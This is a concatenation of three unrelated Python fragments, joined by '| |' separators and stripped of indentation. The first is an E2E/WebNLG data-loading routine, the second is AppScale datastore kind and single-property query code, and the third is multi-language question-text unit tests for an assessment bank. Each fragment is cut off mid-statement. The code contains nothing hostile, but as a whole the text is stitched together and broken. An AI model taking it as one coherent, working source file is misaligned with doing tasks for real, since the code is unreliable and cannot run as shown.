self.maxWordSequenceLength = 0
self.trainingInstances = self.createLists(self.base_dir + trainingFile, forTrain=True, full_delex=opt.full_delex, infer_MRs=opt.infer_MRs)
# Post-processing of training data begins
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
for attr in di.input.attributeValues:
self.available_values.add(di.input.attributeValues[attr])
if di.input.attributeSubjects:
for attr in di.input.attributeSubjects:
self.available_subjects.add(di.input.attributeSubjects[attr])
# Create the evaluation refs for train data
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
refs = set()
refs.add(di.directReference)
refSeqs = [[o.label.lower() for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
refActionSeqs = [[o for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
for di2 in self.trainingInstances[predicate]:
if di != di2 and di2.input.getAbstractMR() == di.input.getAbstractMR():
refs.add(" ".join(lexicalize_word_sequence(di2.directReferenceSequence, di.input.delexicalizationMap, complex_relex=True)).strip())
if di2.directReferenceSequence not in refSeqs:
refSeqs.append(list(o.label.lower() for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT))
refActionSeqs.append(list([o for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT]))
di.output.evaluationReferences = refs
di.output.evaluationReferenceSequences = refSeqs
di.output.evaluationReferenceActionSequences = refActionSeqs
di.output.calcEvaluationReferenceAttrValueSequences()
for refSeq in refSeqs:
refSeqTxt = ' '.join(refSeq)
if refSeqTxt not in self.ngram_lists_per_word_sequence:
self.ngram_lists_per_word_sequence[refSeqTxt] = self.get_ngram_list(refSeq)
self.initializeActionSpace()
if opt.trim:
self.trimTrainingSpace()
# Initializing the action space again after trimming results in less actions
self.initializeActionSpace()
self.vocabulary_per_attr = {}
for predicate in self.attributes:
self.vocabulary_per_attr[predicate] = {}
for attr in self.attributes[predicate]:
self.vocabulary_per_attr[predicate][attr] = set()
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
for a in di.directReferenceSequence:
if a.label != Action.TOKEN_SHIFT:
attr = cleanAndGetAttr(a.attribute)
self.vocabulary_per_attr[di.input.predicate][attr].add(a.label)
for predicate in self.trainingInstances:
if predicate not in self.train_src_to_di:
self.train_src_to_di[predicate] = {}
for di in self.trainingInstances[predicate]:
di.input.nn_src = " ".join(["{} {}".format(attr, di.input.attributeValues[attr]) if attr in di.input.attributeValues else "{}@none@ {}_value@none@".format(attr, attr) for attr in [i for i in di.directAttrSequence if i != Action.TOKEN_SHIFT]])
self.train_src_to_di[predicate][di.input.nn_src] = di
for ref in di.output.evaluationReferences:
refSeq = ref.split(" ")
if ref not in self.ngram_lists_per_relexed_word_sequence:
self.ngram_lists_per_relexed_word_sequence[ref] = self.get_ngram_list(refSeq)
self.writeTrainingLists(opt.trim, opt.full_delex, opt.infer_MRs)
else:
self.initializeActionSpace()
if not light:
self.most_common_words = set()
for predicate in self.trainingInstances:
for word, count in self.availableWordCounts[predicate].most_common():
inAll = True
for attr in self.attributes[predicate]:
if word not in self.availableWordActions[predicate][attr]:
inAll = False
break
if inAll:
self.most_common_words.add(word)
if len(self.most_common_words) > 30:
break
# Silly way of filtering at least one occurence
#total_relexed_ngram_lists_tmp = set()
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
for ref in di.output.evaluationReferences:
refSeq = ref.split(" ")
for n_gram in self.get_ngram_list(refSeq, min=3):
#if n_gram in total_relexed_ngram_lists_tmp:
self.total_relexed_ngram_lists.add(n_gram)
#else:
# total_relexed_ngram_lists_tmp.add(n_gram)
scp = False
if (opt.reset or not self.loadDevelopmentLists(opt.full_delex, light)) and developmentFile:
devs = self.createLists(self.base_dir + developmentFile, full_delex=opt.full_delex)
# Create the evaluation refs for development data, as described in https://github.com/tuetschek/e2e-metrics/tree/master/example-inputs
self.developmentInstances = {}
for predicate in devs:
self.developmentInstances[predicate] = []
for di in devs[predicate]:
di.init_alt_outputs()
refs = set()
refs.add(di.directReference)
refSeqs = [[o.label.lower() for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
refActionSeqs = [[o for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
for di2 in devs[predicate]:
if di != di2 and di2.input.getAbstractMR() == di.input.getAbstractMR():
refs.add(" ".join(lexicalize_word_sequence(di2.directReferenceSequence, di.input.delexicalizationMap, complex_relex=True)).strip())
if di2.directReferenceSequence not in refSeqs:
refSeqs.append(list(o.label.lower() for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT))
refActionSeqs.append(list([o for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT]))
di.output.evaluationReferences = set(refs)
di.output.evaluationReferenceSequences = refSeqs[:]
di.output.evaluationReferenceActionSequences = refActionSeqs[:]
di.output.calcEvaluationReferenceAttrValueSequences()
self.developmentInstances[predicate].append(di)
scp = SimpleContentPredictor(self.dataset, self.attributes, self.trainingInstances)
for predicate in self.developmentInstances:
if predicate not in self.dev_src_to_di:
self.dev_src_to_di[predicate] = {}
for di in self.developmentInstances[predicate]:
content_sequence = [cleanAndGetAttr(a.attribute) for a in
scp.rollContentSequence_withLearnedPolicy(di) if
cleanAndGetAttr(a.attribute) != Action.TOKEN_SHIFT]
di.input.nn_src = " ".join(["{} {}".format(attr, di.input.attributeValues[
attr]) if attr in di.input.attributeValues else "{}@none@ {}_value@none@".format(attr,
attr) for
attr in content_sequence])
self.dev_src_to_di[predicate][di.input.nn_src] = di
self.writeDevelopmentLists(opt.full_delex)
for predicate in self.developmentInstances:
for di in self.developmentInstances[predicate]:
for ref in di.output.evaluationReferences:
refSeq = ref.split(" ")
if ref not in self.ngram_lists_per_relexed_word_sequence:
self.ngram_lists_per_relexed_word_sequence[ref] = self.get_ngram_list(refSeq)
for predicate in self.developmentInstances:
for di in self.developmentInstances[predicate]:
for attr in di.input.attributeValues:
self.available_values.add(di.input.attributeValues[attr])
if di.input.attributeSubjects:
for attr in di.input.attributeSubjects:
self.available_subjects.add(di.input.attributeSubjects[attr])
self.writeTrainingLists(opt.trim, opt.full_delex, opt.infer_MRs)
if (opt.reset or not self.loadTestingLists(opt.full_delex, light)) and testingFile:
tests = self.createLists(self.base_dir + testingFile, full_delex=opt.full_delex)
self.testingInstances = {}
for predicate in tests:
self.testingInstances[predicate] = []
for di in tests[predicate]:
di.init_alt_outputs()
refs = set()
refs.add(di.directReference)
refSeqs = [
[o.label.lower() for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
refActionSeqs = [[o for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
for di2 in tests[predicate]:
if di != di2 and di2.input.MRstr == di.input.MRstr:
refs.add(di2.directReference)
if di2.directReferenceSequence not in refSeqs:
refSeqs.append(list(o.label.lower() for o in di2.directReferenceSequence if
o.label != Action.TOKEN_SHIFT))
refActionSeqs.append(
list([o for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT]))
di.output.evaluationReferences = set(refs)
di.output.evaluationReferenceSequences = refSeqs[:]
di.output.evaluationReferenceActionSequences = refActionSeqs[:]
di.output.calcEvaluationReferenceAttrValueSequences()
self.testingInstances[predicate].append(di)
if not scp:
scp = SimpleContentPredictor(self.dataset, self.attributes, self.trainingInstances)
for predicate in self.testingInstances:
if predicate not in self.test_src_to_di:
self.test_src_to_di[predicate] = {}
for di in self.testingInstances[predicate]:
content_sequence = [cleanAndGetAttr(a.attribute) for a in
scp.rollContentSequence_withLearnedPolicy(di) if
cleanAndGetAttr(a.attribute) != Action.TOKEN_SHIFT]
di.input.nn_src = " ".join(["{} {}".format(attr, di.input.attributeValues[
attr]) if attr in di.input.attributeValues else "{}@none@ {}_value@none@".format(attr,
attr)
for
attr in content_sequence])
self.test_src_to_di[predicate][di.input.nn_src] = di
self.writeTestingLists(opt.full_delex)
if not light:
self.write_onmt_data(opt)
def get_ngram_list(self, word_sequence, min=1):
ngram_list = []
seq = word_sequence[:]
if min <= 4:
ngram_list.extend(ngrams(seq, 4, pad_left=True, pad_right=True))
if min <= 3:
ngram_list.extend(ngrams(seq, 3, pad_left=True, pad_right=True))
if min <= 2:
ngram_list.extend(ngrams(seq, 2, pad_left=True, pad_right=True))
if min <= 1:
ngram_list.extend(seq)
return ngram_list
def createLists(self, dataFile, forTrain=False, full_delex=False, infer_MRs=False):
if self.dataset.lower() == 'e2e':
return self.createLists_E2E(dataFile, forTrain, full_delex, infer_MRs)
elif self.dataset.lower() == 'webnlg':
return self.createLists_webnlg(dataFile, forTrain)
elif self.dataset.lower() == 'sfhotel':
return self.createLists_SFX(dataFile, forTrain)
def createLists_E2E(self, dataFile, forTrain=False, full_delex=False, infer_MRs=False):
print("Create lists from ", dataFile, "...")
singlePredicate = 'inform'
instances = dict()
instances[singlePredicate] = []
dataPart = []
# We read the data from the data files.
with open(dataFile, encoding="utf8") as f:
lines = f.readlines()
for s in lines:
s = str(s)
if s.startswith("\""):
dataPart.append(s)
# This dataset has no predicates, so we assume a default predicate
self.predicates.append(singlePredicate)
num = 0
err = 0
# Each line corresponds to a MR
for line in dataPart:
#if num == 0:
# num += 1
# continue
num += 1
if "\"," in line:
MRPart = line.split("\",")[0].strip()
refPart = line.split("\",")[1].lower().strip()
else:
MRPart = line.strip()
refPart = ""
if refPart.startswith("\"") and refPart.endswith("\""):
refPart = refPart[1:-1]
if MRPart.startswith("\""):
MRPart = MRPart[1:]
if refPart.startswith("\""):
refPart = refPart[1:]
if refPart.endswith("\""):
refPart = refPart[:-1]
refPart = re.sub("([.,?:;!'-])", " \g<1> ", refPart)
refPart = refPart.replace("\\?", " \\? ").replace("\\.", " \\.").replace(",", " , ").replace(" ", " ").strip()
refPart = " ".join(refPart.split())
MRAttrValues = MRPart.split(",")
if full_delex:
while ' moderately ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" moderately ", " moderate -ly ").strip()
while ' averagely ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" averagely ", " average -ly ").strip()
while ' highly ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" highly ", " high -ly ").strip()
while ' 5the ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" 5the ", " 5 the ").strip()
# Map from original values to delexicalized values
delexicalizedMap = {}
# Map attributes to their values
attributeValues = {}
for attrValue in MRAttrValues:
value = attrValue[attrValue.find("[") + 1:attrValue.find("]")].strip().lower()
attribute = attrValue[0:attrValue.find("[")].strip().lower().replace(" ", "_").lower()
if attribute == 'familyfriendly' and | |
+ self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + \
str(ancestor_filter) + \
self._TERM_STRING
if '__key__' not in filter_info:
return startrow, endrow, start_inclusive, end_inclusive
for key_filter in filter_info['__key__']:
op = key_filter[0]
__key__ = str(key_filter[1])
if op and op == datastore_pb.Query_Filter.EQUAL:
startrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
endrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
elif op and op == datastore_pb.Query_Filter.GREATER_THAN:
start_inclusive = self._DISABLE_INCLUSIVITY
startrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
elif op and op == datastore_pb.Query_Filter.GREATER_THAN_OR_EQUAL:
startrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
elif op and op == datastore_pb.Query_Filter.LESS_THAN:
endrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
end_inclusive = self._DISABLE_INCLUSIVITY
elif op and op == datastore_pb.Query_Filter.LESS_THAN_OR_EQUAL:
endrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
return startrow, endrow, start_inclusive, end_inclusive
def default_namespace(self):
""" Returns the default namespace entry because the groomer does not
generate it for each application.
Returns:
A entity proto of the default metadata.Namespace.
"""
default_namespace = Namespace(id=1)
protobuf = db.model_to_protobuf(default_namespace)
last_path = protobuf.key().path().element_list()[-1]
last_path.set_id(1)
return protobuf.Encode()
@gen.coroutine
def __kind_query(self, query, filter_info, order_info):
""" Performs kind only queries, kind and ancestor, and ancestor queries
https://developers.google.com/appengine/docs/python/datastore/queries.
Args:
query: The query to run.
filter_info: tuple with filter operators and values.
order_info: tuple with property name and the sort order.
Returns:
An ordered list of entities matching the query.
Raises:
AppScaleDBError: An infinite loop is detected when fetching references.
"""
self.logger.debug('Kind Query:\n{}'.format(query))
filter_info = self.remove_exists_filters(filter_info)
# Detect quickly if this is a kind query or not.
for fi in filter_info:
if fi != "__key__":
return
if query.has_ancestor() and len(order_info) > 0:
result = yield self.ordered_ancestor_query(query, filter_info, order_info)
raise gen.Return(result)
if query.has_ancestor() and not query.has_kind():
result = yield self.ancestor_query(query, filter_info, order_info)
raise gen.Return(result)
elif not query.has_kind():
result = yield self.kindless_query(query, filter_info)
raise gen.Return(result)
elif query.kind().startswith("__") and \
query.kind().endswith("__"):
# Use the default namespace for metadata queries.
query.set_name_space("")
startrow, endrow, start_inclusive, end_inclusive = \
self.kind_query_range(query, filter_info, order_info)
if startrow is None or endrow is None:
return
if query.has_compiled_cursor() and query.compiled_cursor().position_size():
cursor = appscale_stub_util.ListCursor(query)
last_result = cursor._GetLastResult()
prefix = self.get_table_prefix(query)
startrow = get_kind_key(prefix, last_result.key().path())
start_inclusive = self._DISABLE_INCLUSIVITY
if query.compiled_cursor().position_list()[0].start_inclusive() == 1:
start_inclusive = self._ENABLE_INCLUSIVITY
limit = self.get_limit(query)
if startrow > endrow:
raise gen.Return([])
# Since the validity of each reference is not checked until after the
# range query has been performed, we may need to fetch additional
# references in order to satisfy the query.
entities = []
current_limit = limit
while True:
references = yield self.datastore_batch.range_query(
dbconstants.APP_KIND_TABLE,
dbconstants.APP_KIND_SCHEMA,
startrow,
endrow,
current_limit,
offset=0,
start_inclusive=start_inclusive,
end_inclusive=end_inclusive
)
new_entities = yield self.__fetch_entities(references)
entities.extend(new_entities)
# If we have enough valid entities to satisfy the query, we're done.
if len(entities) >= limit:
break
# If we received fewer references than we asked for, they are exhausted.
if len(references) < current_limit:
break
# If all of the references that we fetched were valid, we're done.
if len(new_entities) == len(references):
break
invalid_refs = len(references) - len(new_entities)
# Pad the limit to increase the likelihood of fetching all the valid
# references that we need.
current_limit = invalid_refs + dbconstants.MAX_GROUPS_FOR_XG
self.logger.debug('{} references invalid. Fetching {} more references.'
.format(invalid_refs, current_limit))
# Start from the last reference fetched.
last_startrow = startrow
startrow = references[-1].keys()[0]
start_inclusive = self._DISABLE_INCLUSIVITY
if startrow == last_startrow:
raise dbconstants.AppScaleDBError(
'An infinite loop was detected while fetching references.')
if query.kind() == "__namespace__":
entities = [self.default_namespace()] + entities
results = entities[:limit]
# Handle projection queries.
if query.property_name_size() > 0:
results = self.remove_extra_props(query, results)
self.logger.debug('Returning {} entities'.format(len(results)))
raise gen.Return(results)
def remove_exists_filters(self, filter_info):
""" Remove any filters that have EXISTS filters.
Args:
filter_info: dict of property names mapping to tuples of filter
operators and values.
Returns:
A filter info dictionary without any EXIST filters.
"""
filtered = {}
for key in filter_info.keys():
if filter_info[key][0][0] == datastore_pb.Query_Filter.EXISTS:
continue
else:
filtered[key] = filter_info[key]
return filtered
def remove_extra_equality_filters(self, potential_filter_ops):
""" Keep only the first equality filter for a given property.
Args:
potential_filter_ops: A list of tuples in the form (operation, value).
Returns:
A filter_ops list with only one equality filter.
"""
filter_ops = []
saw_equality_filter = False
for operation, value in potential_filter_ops:
if operation == datastore_pb.Query_Filter.EQUAL and saw_equality_filter:
continue
if operation == datastore_pb.Query_Filter.EQUAL:
saw_equality_filter = True
filter_ops.append((operation, value))
return filter_ops
@gen.coroutine
def __single_property_query(self, query, filter_info, order_info):
"""Performs queries satisfiable by the Single_Property tables.
Args:
query: The query to run.
filter_info: tuple with filter operators and values.
order_info: tuple with property name and the sort order.
Returns:
List of entities retrieved from the given query.
"""
self.logger.debug('Single Property Query:\n{}'.format(query))
if query.kind().startswith("__") and \
query.kind().endswith("__"):
# Use the default namespace for metadata queries.
query.set_name_space("")
filter_info = self.remove_exists_filters(filter_info)
ancestor = None
property_names = set(filter_info.keys())
property_names.update(x[0] for x in order_info)
property_names.discard('__key__')
if len(property_names) != 1:
return
property_name = property_names.pop()
potential_filter_ops = filter_info.get(property_name, [])
# We will apply the other equality filters after fetching the entities.
filter_ops = self.remove_extra_equality_filters(potential_filter_ops)
multiple_equality_filters = self.__get_multiple_equality_filters(
query.filter_list())
if len(order_info) > 1 or (order_info and order_info[0][0] == '__key__'):
return
# If there is an ancestor in the query, it can only have a single
# equality filter, otherwise there is no way to build the start
# and end key.
if query.has_ancestor() and len(filter_ops) > 0 and \
filter_ops[0][0] != datastore_pb.Query_Filter.EQUAL:
return
if query.has_ancestor():
ancestor = query.ancestor()
if not query.has_kind():
return
if order_info and order_info[0][0] == property_name:
direction = order_info[0][1]
else:
direction = datastore_pb.Query_Order.ASCENDING
prefix = self.get_table_prefix(query)
limit = self.get_limit(query)
app_id = clean_app_id(query.app())
if query.has_compiled_cursor() and query.compiled_cursor().position_size():
cursor = appscale_stub_util.ListCursor(query)
last_result = cursor._GetLastResult()
startrow = yield self.__get_start_key(
prefix, property_name, direction, last_result, query=query)
else:
startrow = None
end_compiled_cursor = None
if query.has_end_compiled_cursor():
end_compiled_cursor = query.end_compiled_cursor()
# Since the validity of each reference is not checked until after the
# range query has been performed, we may need to fetch additional
# references in order to satisfy the query.
entities = []
current_limit = limit
while True:
references = yield self.__apply_filters(
filter_ops, order_info, property_name, query.kind(), prefix,
current_limit, 0, startrow, ancestor=ancestor, query=query,
end_compiled_cursor=end_compiled_cursor)
potential_entities = yield self.__fetch_entities_dict(references)
# Since the entities may be out of order due to invalid references,
# we construct a new list in order of valid references.
new_entities = []
for reference in references:
if self.__valid_index_entry(reference, potential_entities, direction,
property_name):
entity_key = reference[reference.keys()[0]]['reference']
valid_entity = potential_entities[entity_key]
new_entities.append(valid_entity)
if len(multiple_equality_filters) > 0:
self.logger.debug('Detected multiple equality filters on a repeated'
'property. Removing results that do not match query.')
new_entities = self.__apply_multiple_equality_filters(
new_entities, multiple_equality_filters)
entities.extend(new_entities)
# If we have enough valid entities to satisfy the query, we're done.
if len(entities) >= limit:
break
# If we received fewer references than we asked for, they are exhausted.
if len(references) < current_limit:
break
# If all of the references that we fetched were valid, we're done.
if len(new_entities) == len(references):
break
invalid_refs = len(references) - len(new_entities)
# Pad the limit to increase the likelihood of fetching all the valid
# references that we need.
current_limit = invalid_refs + dbconstants.MAX_GROUPS_FOR_XG
self.logger.debug('{} references invalid. Fetching {} more references.'
.format(invalid_refs, current_limit))
last_startrow = startrow
# Start from the last reference fetched.
startrow = references[-1].keys()[0]
if startrow == last_startrow:
raise dbconstants.AppScaleDBError(
'An infinite loop was detected while fetching references.')
results = entities[:limit]
# Handle projection queries.
# TODO: When the index has been confirmed clean, use those values directly.
if query.property_name_size() > 0:
results = self.remove_extra_props(query, results)
self.logger.debug('Returning {} results'.format(len(results)))
raise gen.Return(results)
@gen.coroutine
def __apply_filters(self,
filter_ops,
order_info,
property_name,
kind,
prefix,
limit,
offset,
startrow,
force_start_key_exclusive=False,
ancestor=None,
query=None,
end_compiled_cursor=None):
""" Applies property filters in the query.
Args:
filter_ops: Tuple with property filter operator and value.
order_info: Tuple with property name and sort order.
kind: Kind of the entity.
prefix: Prefix for the table.
limit: Number of results.
offset: Number of results to skip.
startrow: Start key for the range scan.
force_start_key_exclusive: Do not include the start key.
ancestor: Optional query | |
self._bank.get_item_form_for_create([MULTI_LANGUAGE_OBJECT_RECORD])
form.add_description(self._english())
form.add_description(self._telugu())
item = self._bank.create_item(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.description.text,
self._english_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.description.text,
self._english_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.description.text,
self._telugu_text
)
def test_first_available_description_if_locale_code_and_english_not_available(self):
form = self._bank.get_item_form_for_create([MULTI_LANGUAGE_OBJECT_RECORD])
form.add_description(self._telugu())
item = self._bank.create_item(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.description.text,
self._telugu_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.description.text,
self._telugu_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.description.text,
self._telugu_text
)
class MultiLanguageQuestionTests(MultiLanguageBaseTestCase):
def setUp(self):
super(MultiLanguageQuestionTests, self).setUp()
def tearDown(self):
super(MultiLanguageQuestionTests, self).tearDown()
def test_can_set_multiple_question_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
self._english_text
)
def test_can_clear_question_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
self._english_text
)
form = self._bank.get_question_form_for_update(question.ident)
form.clear_texts()
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
0
)
self.assertEqual(
item.get_question().get_text().text,
''
)
def test_can_remove_a_question_text_by_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
form = self._bank.get_question_form_for_update(question.ident)
form.remove_text_language(self._english().language_type)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
2
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
self._hindi_text
)
def test_can_replace_a_question_text(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
new_english_feedback = DisplayText(display_text_map={
'text': 'foo',
'languageTypeId': '639-2%3AENG%40ISO',
'scriptTypeId': '15924%3ALATN%40ISO',
'formatTypeId': 'TextFormats%3APLAIN%40okapia.net'
})
form = self._bank.get_question_form_for_update(question.ident)
form.edit_text(new_english_feedback)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(new_english_feedback), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
'foo'
)
def test_setting_proxy_locale_gets_question_text_in_specified_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_text().text,
self._hindi_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_text().text,
self._english_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_text().text,
self._telugu_text
)
def test_english_default_question_text_if_locale_code_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_text().text,
self._english_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_text().text,
self._english_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_text().text,
self._telugu_text
)
def test_first_available_question_text_if_locale_code_and_english_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_text().text,
self._telugu_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_text().text,
self._telugu_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_text().text,
self._telugu_text
)
class MultiLanguageMultipleChoiceQuestionTests(MultiLanguageBaseTestCase):
def setUp(self):
super(MultiLanguageMultipleChoiceQuestionTests, self).setUp()
def tearDown(self):
super(MultiLanguageMultipleChoiceQuestionTests, self).tearDown()
def test_can_set_multiple_choice_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
def test_can_clear_choice_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
